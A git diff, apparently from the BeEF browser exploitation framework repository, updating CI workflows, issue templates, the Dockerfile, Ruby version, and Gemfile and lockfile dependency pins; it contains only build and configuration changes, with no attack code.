Update workflow for PRs to require safe-to-test label to run BrowserStack tests

Bump lodash from 4.17.21 to 4.17.23

.bundle/config

@@ -1,2 +1,3 @@
 ---
 BUNDLE_WITHOUT: "development:test"
+BUNDLE_WITH: "geoip:ext_msf:ext_notifications:ext_dns:ext_qrcode"

.dockerignore

@@ -4,6 +4,5 @@
 .gitignore
 doc
 docs
-scripts
 test
-update-beef
+update-beef

.github/ISSUE_TEMPLATE/bug_report.md

@@ -1,3 +1,8 @@
+---
+name: Bug report
+about: Report a bug to help us improve BeEF
+---
+
 ## First Steps
 
 1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
@@ -26,6 +31,7 @@
 2. Update `client_debug` to `true`
 3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
 4. Retrieve your server-side logs from `~/.beef/beef.log`
-   * If using **beef-xss** logs found with `journalctl -u beef-xss`
+   * If you have a kali (beef-xss) problem, you can submit a bug here:
+     https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/
 
 **If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**

.github/ISSUE_TEMPLATE/config.yml

@@ -0,0 +1,5 @@
+blank_issues_enabled: false
+contact_links:
+  - name: Questions / Support
+    url: https://github.com/beefproject/beef/wiki
+    about: Please check the wiki before opening an issue.

.github/workflows/dependabot-auto-merge.yml

@@ -0,0 +1,26 @@
+name: Dependabot auto-merge
+on: 
+  pull_request:
+    branches:
+        - master
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  dependabot:
+    runs-on: ubuntu-latest
+    if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
+    steps:
+      - name: Dependabot metadata
+        id: metadata
+        uses: dependabot/fetch-metadata@v2
+        with:
+          github-token: "${{ secrets.GITHUB_TOKEN }}"
+      - name: Enable auto-merge for Dependabot PRs
+        if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
+        run: gh pr merge --auto --merge "$PR_URL"
+        env:
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/github_actions.yml

@@ -2,25 +2,34 @@ name: 'BrowserStack Test'
 
 on:
   pull_request_target:
+    types: [opened, synchronize, reopened, labeled]
     branches: [ master ]
-      
-jobs:
-  approve:
-    runs-on: ubuntu-latest
 
-    steps:
-    - name: Approve
-      run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
-      
+jobs:    
   ubuntu-job:
     name: 'BrowserStack Test on Ubuntu'
+    if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
     runs-on: ubuntu-latest  # Can be self-hosted runner also
+    permissions:
+      contents: read
+      pull-requests: write
     environment:
       name: Integrate Pull Request
     env: 
       GITACTIONS: true
     steps:
 
+      - name: 'Remove safe-to-test label'
+        uses: actions/github-script@v6
+        with:
+          script: |
+            github.rest.issues.removeLabel({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              issue_number: context.issue.number,
+              name: 'safe-to-test'
+            })
+
       - name: 'BrowserStack Env Setup'  # Invokes the setup-env action
         uses: browserstack/github-actions/setup-env@master
         with:
@@ -34,26 +43,29 @@ jobs:
           local-identifier: random
 
       - name: 'Checkout the repository'
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 2
 
       - name: 'Setting up Ruby'
         uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: 3.0.3 # Not needed with a .ruby-version file
+        # Ruby version is defined in .ruby-version file
 
-      - name: 'Build and run tests'
+      - name: 'Update and Install Dependencies'
         run: |
           sudo apt update
           sudo apt install libcurl4 libcurl4-openssl-dev
+      - name: 'Configure Bundle testing and install gems'
+        run: |
           bundle config unset --local without
           bundle config set --local with 'test' 'development'
           bundle install
+      - name: 'Run BrowserStack simple verification'
+        run: |
           bundle exec rake browserstack --trace
 
       - name: 'BrowserStackLocal Stop'  # Terminating the BrowserStackLocal tunnel connection
         uses: browserstack/github-actions/setup-local@master
         with:
-          local-testing: stop
+          local-testing: stop

.github/workflows/stale.yml

@@ -21,10 +21,10 @@ jobs:
     - uses: actions/stale@v5
       with:
         repo-token: ${{ secrets.GITHUB_TOKEN }}
-        days-before-stale: 7
-        days-before-pr-stale: 14
-        days-before-close: 7
-        days-before-pr-close: 14
+        days-before-stale: 14
+        days-before-pr-stale: 29
+        days-before-close: 11
+        days-before-pr-close: 31
         stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
         stale-pr-message: 'Stale pull request message'
         stale-issue-label: 'Stale'

.gitignore

@@ -1,5 +1,7 @@
 ### BeEF ###
 beef.db
+beef.db-shm
+beef.db-wal
 beef.log
 test/msf-test
 extensions/admin_ui/media/javascript-min/
@@ -25,6 +27,9 @@ coverage/
 # BrowserStack
 local.log
 
+# Visual Studio Code
+.vscode/
+
 # The following lines were created by https://www.gitignore.io
 
 ### Linux ###
@@ -126,3 +131,6 @@ node_modules/
 # Generated files
 out/
 doc/rdoc/
+
+# Secrets for testing github actions locally
+.secrets

.rubocop.yml

@@ -4,7 +4,7 @@ AllCops:
     - 'tmp/**/*'
     - 'tools/**/*'
     - 'doc/**/*'
-  TargetRubyVersion: 3.0
+  TargetRubyVersion: <%= File.read(".ruby-version").strip[/^(\d+\.\d+)/, 1] || raise("Ruby version not found") %>
   NewCops: enable
 
 Layout/LineLength:

.ruby-version

@@ -1 +1 @@
-3.0.3
+3.4.7

BeEF.postman_environment.json

@@ -1,49 +0,0 @@
-{
-	"id": "3b5f29e6-c8eb-4d23-bf52-c01255f22f08",
-	"name": "BeEF",
-	"values": [
-		{
-			"key": "hostname",
-			"value": "127.0.0.1",
-			"enabled": true
-		},
-		{
-			"key": "username",
-			"value": "beef",
-			"enabled": true
-		},
-		{
-			"key": "password",
-			"value": "beef",
-			"enabled": true
-		},
-		{
-			"key": "token",
-			"value": "",
-			"enabled": true
-		},
-		{
-			"key": "session",
-			"value": "",
-			"enabled": true
-		},
-		{
-			"key": "module_id",
-			"value": "",
-			"enabled": true
-		},
-		{
-			"key": "cmd_id",
-			"value": "",
-			"enabled": true
-		},
-		{
-			"key": "dnsrule_id",
-			"value": "",
-			"enabled": true
-		}
-	],
-	"_postman_variable_scope": "environment",
-	"_postman_exported_at": "2020-01-03T06:00:29.827Z",
-	"_postman_exported_using": "Postman/7.14.0"
-}

Dockerfile

@@ -1,63 +1,109 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 ###########################################################################################################
 ###########################################################################################################
 ##                                                                                                       ##
 ##   Please read the Wiki Installation section on set-up using Docker prior to building this container.  ##
 ##   BeEF does NOT allow authentication with default credentials. So please, at the very least           ##
 ##   change the username:password in the config.yaml file to something secure that is not beef:beef      ##
-##   before building or you will to denied access and have to rebuild anyway.                            ##
+##   before building or you will be denied access and have to rebuild anyway.                            ##
 ##                                                                                                       ##
 ###########################################################################################################
 ###########################################################################################################
 
 # ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
-FROM ruby:2.7.5-alpine AS builder
-LABEL maintainer="Beef Project: github.com/beefproject/beef"
-
-# Install gems in parallel with 4 workers to expedite build process.=
-ARG BUNDLER_ARGS="--jobs=4"
-
-# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files
-RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc
+FROM ruby:3.4.7-slim-bookworm AS builder
 
 COPY . /beef
 
-# Add bundler/gem dependencies and then install
-RUN apk add --no-cache git curl libcurl curl-dev ruby-dev libffi-dev make g++ gcc musl-dev zlib-dev sqlite-dev && \
-  bundle install --gemfile=/beef/Gemfile $BUNDLER_ARGS && \
-  # Temp fix for https://github.com/bundler/bundler/issues/6680
-  rm -rf /usr/local/bundle/cache
-
-WORKDIR /beef
-
-# So we don't need to run as root
-RUN chmod -R a+r /usr/local/bundle
+# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files.
+# Then add bundler/gem dependencies and install.
+# Finally change permissions of bundle installs so we don't need to run as root.
+RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
+ && apt-get update \
+ && apt-get install -y --no-install-recommends \
+    git \
+    curl \
+    libssl-dev \
+    xz-utils \
+    pkg-config \
+    make \
+    g++ \
+    libcurl4-openssl-dev \
+    ruby-dev \
+    libyaml-dev \
+    libffi-dev \
+    zlib1g-dev \
+    libsqlite3-dev \
+    sqlite3 \
+ && bundle install --gemfile=/beef/Gemfile --jobs=`nproc` \
+ && rm -rf /usr/local/bundle/cache \
+ && chmod -R a+r /usr/local/bundle \
+ && rm -rf /var/lib/apt/lists/*
 # ------------------------------------- End of Builder 0 -------------------------------------------------
 
 
 # ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
-FROM ruby:2.7.5-alpine
-LABEL maintainer="Beef Project: github.com/beefproject/beef"
+FROM ruby:3.4.7-slim-bookworm
+LABEL maintainer="Beef Project" \
+      source_url="github.com/beefproject/beef" \
+      homepage="https://beefproject.com/"
 
-# Create service account to run BeEF
-RUN adduser -h /beef -g beef -D beef
+# BeEF UI/Hook port
+ARG UI_PORT=3000
+ARG PROXY_PORT=6789
+ARG WEBSOCKET_PORT=61985
+ARG WEBSOCKET_SECURE_PORT=61986
 
-COPY --chown=1000:1000 . /beef
+
+# Create service account to run BeEF and install BeEF's runtime dependencies
+RUN adduser --home /beef --gecos beef --disabled-password beef \
+ && apt-get update \
+ && apt-get install -y --no-install-recommends \
+    curl \
+    wget \
+    espeak \
+    lame \
+    openssl \
+    libreadline-dev \
+    libyaml-dev \
+    libxml2-dev \
+    libxslt-dev \
+    libncurses5-dev \
+    libsqlite3-dev \
+    sqlite3 \
+    zlib1g \
+    bison \
+    nodejs \
+    firefox-esr \
+ && apt-get -y clean \
+ && rm -rf /var/lib/apt/lists/*
+
+# Install geckodriver for Selenium tests
+# Pin version and verify checksum to mitigate supply chain attacks
+ENV GECKODRIVER_VERSION=v0.36.0
+ENV GECKODRIVER_SHA256=0bde38707eb0a686a20c6bd50f4adcc7d60d4f73c60eb83ee9e0db8f65823e04
+RUN wget -q "https://github.com/mozilla/geckodriver/releases/download/${GECKODRIVER_VERSION}/geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" \
+ && echo "${GECKODRIVER_SHA256}  geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" | sha256sum -c - \
+ && tar -xzf "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" -C /usr/local/bin \
+ && chmod +x /usr/local/bin/geckodriver \
+ && rm "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz"
 
 # Use gemset created by the builder above
+COPY --chown=beef:beef . /beef
 COPY --from=builder /usr/local/bundle /usr/local/bundle
 
-# Install BeEF's runtime dependencies
-RUN apk add --no-cache curl git build-base openssl readline-dev zlib zlib-dev libressl-dev yaml-dev sqlite-dev sqlite libxml2-dev libxslt-dev autoconf libc6-compat ncurses automake libtool bison nodejs
-
-WORKDIR /beef
-
 # Ensure we are using our service account by default
 USER beef
 
-# Expose UI, Proxy, WebSocket server, and WebSocketSecure server
-EXPOSE 3000 6789 61985 61986
+# Expose UI, Proxy, WebSocket server, and WebSocketSecure server ports
+EXPOSE $UI_PORT $PROXY_PORT $WEBSOCKET_PORT $WEBSOCKET_SECURE_PORT
 
-HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:3000" ]
+HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:$UI_PORT" ]
 
+WORKDIR /beef
 ENTRYPOINT ["/beef/beef"]
 # ------------------------------------- End of Builder 1 -------------------------------------------------

Gemfile

@@ -1,90 +1,90 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-#gem 'simplecov', require: false, group: :test
 
 gem 'net-smtp', require: false
-
-gem 'eventmachine'
-gem 'thin'
-gem 'sinatra', '>= 2.2.0'
-gem 'rack', '>= 2.2.4'
-gem 'rack-protection', '>= 2.2.0'
-gem 'em-websocket' # WebSocket support
-gem 'uglifier', '>= 4.2.0'
-gem 'mime-types'
-gem 'execjs'
-gem 'ansi'
-gem 'term-ansicolor', :require => 'term/ansicolor'
 gem 'json'
-gem 'rubyzip', '>= 1.2.2'
-gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
-gem 'rake', '>= 13.0'
-gem 'otr-activerecord', '>= 1.4.2'
-gem 'sqlite3'
-gem 'rubocop', '~> 1.36.0', require: false
+
+gem 'eventmachine', '~> 1.2', '>= 1.2.7'
+gem 'thin', '~> 2.0'
+gem 'sinatra', '~> 4.1'
+gem 'rack', '~> 3.2'
+gem 'rack-protection', '~> 4.2.1'
+gem 'em-websocket', '~> 0.5.3' # WebSocket support
+gem 'uglifier', '~> 4.2'
+gem 'mime-types', '~> 3.7'
+gem 'execjs', '~> 2.10'
+gem 'ansi', '~> 1.5'
+gem 'term-ansicolor', :require => 'term/ansicolor'
+gem 'rubyzip', '~> 3.2'
+gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
+gem 'rake', '~> 13.3'
+gem 'activerecord', '~> 8.1'
+gem 'otr-activerecord', '~> 2.6.0'
+gem 'sqlite3', '~> 2.9'
+gem 'rubocop', '~> 1.82.1', require: false
 
 # Geolocation support
 group :geoip do
-  gem 'maxmind-db'
+  gem 'maxmind-db', '~> 1.4'
 end
 
-gem 'parseconfig'
-gem 'erubis'
+gem 'parseconfig', '~> 1.1', '>= 1.1.2'
+gem 'erubis', '~> 2.7'
 
 # Metasploit Integration extension
 group :ext_msf do
-  gem 'msfrpc-client'
-  gem 'xmlrpc'
+  gem 'msfrpc-client', '~> 1.1', '>= 1.1.2'
+  gem 'xmlrpc', '~> 0.3.3'
 end
 
 # Notifications extension
 group :ext_notifications do
-  gem 'unf'
-  gem 'domain_name', '>= 0.5.20190701'
   # Pushover
-  gem 'rushover'
+  gem 'rushover', '~> 0.3.0'
   # Slack
-  gem 'slack-notifier'
-  # Twitter
-  gem 'twitter', '>= 7.0.0'
+  gem 'slack-notifier', '~> 2.4'
 end
 
 # DNS extension
 group :ext_dns do
-  gem 'async-dns'
+  gem 'async-dns', '~> 1.4'
+  gem 'async', '~> 1.32'
 end
 
 # QRcode extension
 group :ext_qrcode do
-  gem 'qr4r'
+  gem 'qr4r', '~> 0.6.1'
 end
 
 # For running unit tests
 group :test do
-    gem 'test-unit'
-    gem 'test-unit-full'
-    gem 'rspec'
-    gem 'rdoc'
-    # curb gem requires curl libraries
-    # sudo apt-get install libcurl4-openssl-dev
-    gem 'curb'
-    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
-    # gem 'selenium' # Requires old version of selenium which is no longer available
-    gem 'geckodriver-helper'
-    gem 'selenium-webdriver'
-    # nokogirl is needed by capybara which may require one of the below commands
-    # sudo apt-get install libxslt-dev libxml2-dev
-    # sudo port install libxml2 libxslt
-    gem 'capybara'
-    # RESTful API tests/generic command module tests
-    gem 'rest-client', '>= 2.1.0'
-    gem 'irb'
-    gem 'pry-byebug'
-    gem "websocket-client-simple", "~> 0.6.0"
-    gem "browserstack-local", "~> 1.4"
+  gem 'test-unit-full', '~> 0.0.5'
+  gem 'rspec', '~> 3.13'
+  gem 'rdoc', '~> 7.1'
+  gem 'browserstack-local', '~> 1.4'
+
+  gem 'irb', '~> 1.16'
+  gem 'pry-byebug', '~> 3.12'
+
+  gem 'rest-client', '~> 2.1.0'
+  gem 'websocket-client-simple', '~> 0.6.1'
+
+  # Note: curb gem requires curl libraries
+  # sudo apt-get install libcurl4-openssl-dev
+  gem 'curb', '~> 1.2'
+
+  # Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
+  # gem 'selenium' # Requires old version of selenium which is no longer available
+  gem 'geckodriver-helper', '~> 0.24.0'
+  gem 'selenium-webdriver', '~> 4.40'
+
+  # Note: nokogiri is needed by capybara which may require one of the below commands
+  # sudo apt-get install libxslt-dev libxml2-dev
+  # sudo port install libxml2 libxslt
+  gem 'capybara', '~> 3.40'
 end
 
 source 'https://rubygems.org'

Gemfile.lock

@@ -1,206 +1,250 @@
 GEM
   remote: https://rubygems.org/
   specs:
-    activemodel (7.0.3.1)
-      activesupport (= 7.0.3.1)
-    activerecord (7.0.3.1)
-      activemodel (= 7.0.3.1)
-      activesupport (= 7.0.3.1)
-    activesupport (7.0.3.1)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+    activemodel (8.1.2)
+      activesupport (= 8.1.2)
+    activerecord (8.1.2)
+      activemodel (= 8.1.2)
+      activesupport (= 8.1.2)
+      timeout (>= 0.4.0)
+    activesupport (8.1.2)
+      base64
+      bigdecimal
+      concurrent-ruby (~> 1.0, >= 1.3.1)
+      connection_pool (>= 2.2.5)
+      drb
       i18n (>= 1.6, < 2)
+      json
+      logger (>= 1.4.2)
       minitest (>= 5.1)
-      tzinfo (~> 2.0)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+      securerandom (>= 0.3)
+      tzinfo (~> 2.0, >= 2.0.5)
+      uri (>= 0.13.1)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
     ansi (1.5.0)
-    archive-zip (0.12.0)
-      io-like (~> 0.3.0)
-    ast (2.4.2)
-    async (1.30.3)
+    archive-zip (0.13.1)
+      io-like (~> 0.4.0)
+    ast (2.4.3)
+    async (1.32.1)
       console (~> 1.10)
       nio4r (~> 2.3)
       timers (~> 4.1)
-    async-dns (1.3.0)
-      async-io (~> 1.15)
-    async-io (1.33.0)
+    async-dns (1.4.1)
       async
-    browserstack-local (1.4.0)
-    buftok (0.2.0)
-    byebug (11.1.3)
-    capybara (3.37.1)
+      io-endpoint
+    base64 (0.3.0)
+    bigdecimal (4.0.1)
+    browserstack-local (1.4.3)
+    byebug (13.0.0)
+      reline (>= 0.6.0)
+    capybara (3.40.0)
       addressable
       matrix
       mini_mime (>= 0.1.3)
-      nokogiri (~> 1.8)
+      nokogiri (~> 1.11)
       rack (>= 1.6.0)
       rack-test (>= 0.6.3)
       regexp_parser (>= 1.5, < 3.0)
       xpath (~> 3.2)
-    childprocess (4.1.0)
     coderay (1.1.3)
-    concurrent-ruby (1.1.10)
-    console (1.15.3)
-      fiber-local
-    curb (1.0.1)
+    concurrent-ruby (1.3.6)
+    connection_pool (3.0.2)
+    console (1.34.0)
+      fiber-annotation
+      fiber-local (~> 1.1)
+      json
+    curb (1.2.2)
     daemons (1.4.1)
-    diff-lcs (1.5.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    date (3.5.1)
+    diff-lcs (1.6.2)
+    domain_name (0.6.20240107)
+    drb (2.2.3)
     em-websocket (0.5.3)
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0)
-    equalizer (0.0.11)
+    erb (6.0.1)
     erubis (2.7.0)
     espeak-ruby (1.1.0)
     event_emitter (0.2.6)
     eventmachine (1.2.7)
-    execjs (2.8.1)
-    ffi (1.15.5)
-    ffi-compiler (1.0.1)
-      ffi (>= 1.0.0)
-      rake
-    fiber-local (1.0.0)
+    execjs (2.10.0)
+    fiber-annotation (0.2.0)
+    fiber-local (1.1.0)
+      fiber-storage
+    fiber-storage (1.0.1)
     geckodriver-helper (0.24.0)
       archive-zip (~> 0.7)
-    hashie (5.0.0)
-    hashie-forbidden_attributes (0.1.1)
-      hashie (>= 3.0)
-    http (4.4.1)
-      addressable (~> 2.3)
-      http-cookie (~> 1.0)
-      http-form_data (~> 2.2)
-      http-parser (~> 1.2.0)
     http-accept (1.7.0)
-    http-cookie (1.0.5)
+    http-cookie (1.0.8)
       domain_name (~> 0.5)
-    http-form_data (2.3.0)
-    http-parser (1.2.3)
-      ffi-compiler (>= 1.0, < 2.0)
-    http_parser.rb (0.6.0)
-    i18n (1.12.0)
+    http_parser.rb (0.8.0)
+    i18n (1.14.8)
       concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    io-like (0.3.1)
-    irb (1.4.2)
-      reline (>= 0.3.0)
-    json (2.6.2)
-    matrix (0.4.2)
-    maxmind-db (1.1.1)
-    memoizable (0.4.2)
-      thread_safe (~> 0.3, >= 0.3.1)
-    method_source (1.0.0)
-    mime-types (3.4.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2022.0105)
-    mini_mime (1.1.2)
-    minitest (5.16.2)
-    mojo_magick (0.6.7)
+    io-console (0.8.2)
+    io-endpoint (0.15.2)
+    io-like (0.4.0)
+    irb (1.16.0)
+      pp (>= 0.6.0)
+      rdoc (>= 4.0.0)
+      reline (>= 0.4.2)
+    json (2.18.0)
+    language_server-protocol (3.17.0.5)
+    lint_roller (1.1.0)
+    logger (1.7.0)
+    matrix (0.4.3)
+    maxmind-db (1.4.0)
+    method_source (1.1.0)
+    mime-types (3.7.0)
+      logger
+      mime-types-data (~> 3.2025, >= 3.2025.0507)
+    mime-types-data (3.2025.0902)
+    mini_mime (1.1.5)
+    minitest (6.0.1)
+      prism (~> 1.5)
+    mojo_magick (0.6.8)
     msfrpc-client (1.1.2)
       msgpack (~> 1)
-    msgpack (1.5.4)
-    multipart-post (2.2.3)
-    mustermann (3.0.0)
+    msgpack (1.8.0)
+    mustermann (3.0.4)
       ruby2_keywords (~> 0.0.1)
-    naught (1.1.0)
-    net-protocol (0.1.3)
+    net-protocol (0.2.2)
       timeout
-    net-smtp (0.3.2)
+    net-smtp (0.5.1)
       net-protocol
     netrc (0.11.0)
-    nio4r (2.5.8)
-    nokogiri (1.13.8-x86_64-linux)
+    nio4r (2.7.4)
+    nokogiri (1.18.9-aarch64-linux-gnu)
       racc (~> 1.4)
-    otr-activerecord (2.1.1)
-      activerecord (>= 4.0, < 7.1)
-      hashie-forbidden_attributes (~> 0.1)
-    parallel (1.22.1)
+    nokogiri (1.18.9-aarch64-linux-musl)
+      racc (~> 1.4)
+    nokogiri (1.18.9-arm-linux-gnu)
+      racc (~> 1.4)
+    nokogiri (1.18.9-arm-linux-musl)
+      racc (~> 1.4)
+    nokogiri (1.18.9-arm64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.18.9-x86_64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.18.9-x86_64-linux-gnu)
+      racc (~> 1.4)
+    nokogiri (1.18.9-x86_64-linux-musl)
+      racc (~> 1.4)
+    otr-activerecord (2.6.0)
+      activerecord (>= 6.0, < 9.0)
+    parallel (1.27.0)
     parseconfig (1.1.2)
-    parser (3.1.2.1)
+    parser (3.3.10.0)
       ast (~> 2.4.1)
-    power_assert (2.0.1)
-    pry (0.14.1)
+      racc
+    power_assert (2.0.5)
+    pp (0.6.3)
+      prettyprint
+    prettyprint (0.2.0)
+    prism (1.7.0)
+    pry (0.16.0)
       coderay (~> 1.1)
       method_source (~> 1.0)
-    pry-byebug (3.10.1)
-      byebug (~> 11.0)
-      pry (>= 0.13, < 0.15)
-    psych (4.0.4)
+      reline (>= 0.6.0)
+    pry-byebug (3.12.0)
+      byebug (~> 13.0)
+      pry (>= 0.13, < 0.17)
+    psych (5.3.1)
+      date
       stringio
-    public_suffix (4.0.7)
-    qr4r (0.6.1)
+    public_suffix (6.0.2)
+    qr4r (0.6.2)
       mojo_magick (~> 0.6.5)
-      rqrcode_core (~> 0.1)
-    racc (1.6.0)
-    rack (2.2.4)
-    rack-protection (3.0.2)
-      rack
-    rack-test (2.0.2)
+      rqrcode_core (~> 1.0)
+    racc (1.8.1)
+    rack (3.2.4)
+    rack-protection (4.2.1)
+      base64 (>= 0.1.0)
+      logger (>= 1.6.0)
+      rack (>= 3.0.0, < 4)
+    rack-session (2.1.1)
+      base64 (>= 0.1.0)
+      rack (>= 3.0.0)
+    rack-test (2.2.0)
       rack (>= 1.3)
     rainbow (3.1.1)
-    rake (13.0.6)
-    rdoc (6.4.0)
+    rake (13.3.1)
+    rdoc (7.1.0)
+      erb
       psych (>= 4.0.0)
-    regexp_parser (2.5.0)
-    reline (0.3.1)
+      tsort
+    regexp_parser (2.11.3)
+    reline (0.6.3)
       io-console (~> 0.5)
     rest-client (2.1.0)
       http-accept (>= 1.7.0, < 2.0)
       http-cookie (>= 1.0.2, < 2.0)
       mime-types (>= 1.16, < 4.0)
       netrc (~> 0.8)
-    rexml (3.2.5)
-    rqrcode_core (0.2.0)
-    rr (3.1.0)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rexml (3.4.4)
+    rqrcode_core (1.2.0)
+    rr (3.1.2)
+    rspec (3.13.2)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.6)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.5)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.6)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-support (3.11.0)
-    rubocop (1.36.0)
+      rspec-support (~> 3.13.0)
+    rspec-support (3.13.6)
+    rubocop (1.82.1)
       json (~> 2.3)
+      language_server-protocol (~> 3.17.0.2)
+      lint_roller (~> 1.1.0)
       parallel (~> 1.10)
-      parser (>= 3.1.2.1)
+      parser (>= 3.3.0.2)
       rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.20.1, < 2.0)
+      regexp_parser (>= 2.9.3, < 3.0)
+      rubocop-ast (>= 1.48.0, < 2.0)
       ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.21.0)
-      parser (>= 3.1.1.0)
-    ruby-progressbar (1.11.0)
+      unicode-display_width (>= 2.4.0, < 4.0)
+    rubocop-ast (1.48.0)
+      parser (>= 3.3.7.2)
+      prism (~> 1.4)
+    ruby-progressbar (1.13.0)
     ruby2_keywords (0.0.5)
-    rubyzip (2.3.2)
+    rubyzip (3.2.2)
     rushover (0.3.0)
       json
       rest-client
-    selenium-webdriver (4.5.0)
-      childprocess (>= 0.5, < 5.0)
+    securerandom (0.4.1)
+    selenium-webdriver (4.40.0)
+      base64 (~> 0.2)
+      logger (~> 1.4)
       rexml (~> 3.2, >= 3.2.5)
-      rubyzip (>= 1.2.2, < 3.0)
+      rubyzip (>= 1.2.2, < 4.0)
       websocket (~> 1.0)
-    simple_oauth (0.3.1)
-    sinatra (3.0.2)
+    sinatra (4.2.1)
+      logger (>= 1.6.0)
       mustermann (~> 3.0)
-      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.2)
+      rack (>= 3.0.0, < 4)
+      rack-protection (= 4.2.1)
+      rack-session (>= 2.0.0, < 3)
       tilt (~> 2.0)
     slack-notifier (2.4.0)
-    sqlite3 (1.5.3-x86_64-linux)
-    stringio (3.0.2)
+    sqlite3 (2.9.0-aarch64-linux-gnu)
+    sqlite3 (2.9.0-aarch64-linux-musl)
+    sqlite3 (2.9.0-arm-linux-gnu)
+    sqlite3 (2.9.0-arm-linux-musl)
+    sqlite3 (2.9.0-arm64-darwin)
+    sqlite3 (2.9.0-x86_64-darwin)
+    sqlite3 (2.9.0-x86_64-linux-gnu)
+    sqlite3 (2.9.0-x86_64-linux-musl)
+    stringio (3.2.0)
     sync (0.5.0)
-    term-ansicolor (1.7.1)
-      tins (~> 1.0)
-    test-unit (3.5.5)
+    term-ansicolor (1.11.3)
+      tins (~> 1)
+    test-unit (3.7.0)
       power_assert
     test-unit-context (0.5.1)
       test-unit (>= 2.4.0)
@@ -217,93 +261,89 @@ GEM
       test-unit (>= 2.5.2)
     test-unit-runner-tap (1.1.2)
       test-unit
-    thin (1.8.1)
+    thin (2.0.1)
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    thread_safe (0.3.6)
-    tilt (2.0.11)
-    timeout (0.3.0)
-    timers (4.3.3)
-    tins (1.31.1)
+      logger
+      rack (>= 1, < 4)
+    tilt (2.6.1)
+    timeout (0.6.0)
+    timers (4.4.0)
+    tins (1.43.0)
+      bigdecimal
       sync
-    twitter (7.0.0)
-      addressable (~> 2.3)
-      buftok (~> 0.2.0)
-      equalizer (~> 0.0.11)
-      http (~> 4.0)
-      http-form_data (~> 2.0)
-      http_parser.rb (~> 0.6.0)
-      memoizable (~> 0.4.0)
-      multipart-post (~> 2.0)
-      naught (~> 1.0)
-      simple_oauth (~> 0.3.0)
-    tzinfo (2.0.5)
+    tsort (0.2.0)
+    tzinfo (2.0.6)
       concurrent-ruby (~> 1.0)
-    uglifier (4.2.0)
+    uglifier (4.2.1)
       execjs (>= 0.3.0, < 3)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
-    unicode-display_width (2.2.0)
-    webrick (1.7.0)
-    websocket (1.2.9)
-    websocket-client-simple (0.6.0)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.2.0)
